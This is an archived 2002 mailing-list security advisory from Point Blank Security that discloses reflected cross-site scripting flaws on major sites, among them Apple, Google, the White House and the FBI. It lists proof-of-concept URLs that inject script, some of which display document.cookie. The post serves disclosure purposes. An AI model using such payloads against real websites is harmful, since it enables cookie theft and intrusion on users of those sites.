Vulnerability Development mailing list archives
Cross Site Scripting Vulnerabilities on Major Websites
From: "Jeremiah J. Jacks" <jer () pointblanksecurity com>
Date: Fri, 8 Mar 2002 10:25:39 -0800
Point Blank Security Notice Friday, March 08, 2002 Title: Cross Site Scripting Vulnerabilities on Major Websites Advisory: PBS0302001 Author: Jeremiah Jacks, Point Blank Security Contributors: Gary Jones, Point Blank Security Dmitry Golubev, Point Blank Security Summary: http://www.cert.org/archive/pdf/cross_site_scripting.pdf Disclaimer: This information is provided "AS IS". Point Blank Security and the author of this document disclaim all warranties, express and implied, with regard to this information. This information is provided only for legitimate security analysis purposes. Point Blank Security and the author does not condone the unauthorized access of systems, and specifically prohibits the use or reproduction of this information for such purposes. In no event shall Point Blank Security or the author be liable for any damages whatsoever arising out of or in connection with the use or dissemination of this information. Any use of this information is at the user's own risk. Exploitation: Apple 01) http://search03.apple.com/search97cgi/s97_cgi?Action=FilterSearch&Filter=">< script>alert("Point+Blank+Security");</script> Credit: Gary Jones Barnes & Noble 01) http://shop.barnesandnoble.com/booksearch/results.asp?WRD=<script>alert(docu ment.cookie);</script> Credit: Gary Jones The White House 01) http://www.whitehouse.gov/cgi-bin/good-bye.cgi?url=<script>alert("Point+Blan k+Security");</script> Credit: Dmitry Golubev The FBI 01) http://www.fbi.gov/cgi-bin/outside.cgi?<script>alert("Point+Blank+Security") ;</script> Credit: Dmitry Golubev Google 01) http://www.google.com/search?q=pointblanksecurity.com/"><script>alert(docume nt.cookie)</script> Credit: Jeremiah Jacks Alta Vista 02) http://www.altavista.com/sites/search/web?q=<script>alert('ytiruceS+knalB+tn ioP');</script> Credit: Jeremiah Jacks More Examples At: http://www.pointblanksecurity.com/css/
Current thread:
- Cross Site Scripting Vulnerabilities on Major Websites Jeremiah J. Jacks (Mar 08)
- <Possible follow-ups>
- Re: Cross Site Scripting Vulnerabilities on Major Websites alrferreira (Mar 08)